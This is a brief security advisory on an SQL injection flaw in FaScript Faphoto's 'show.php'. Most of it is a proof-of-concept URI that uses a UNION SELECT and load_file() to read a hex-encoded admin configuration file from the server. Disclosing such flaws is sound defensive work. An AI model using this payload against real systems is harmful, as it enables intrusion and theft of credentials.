FaScript Faphoto 'show.php' SQL Injection Vulnerability

FaScript Faphoto 'show.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/faname/show.php?id=-999999%27union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),2,3,4,5,6/*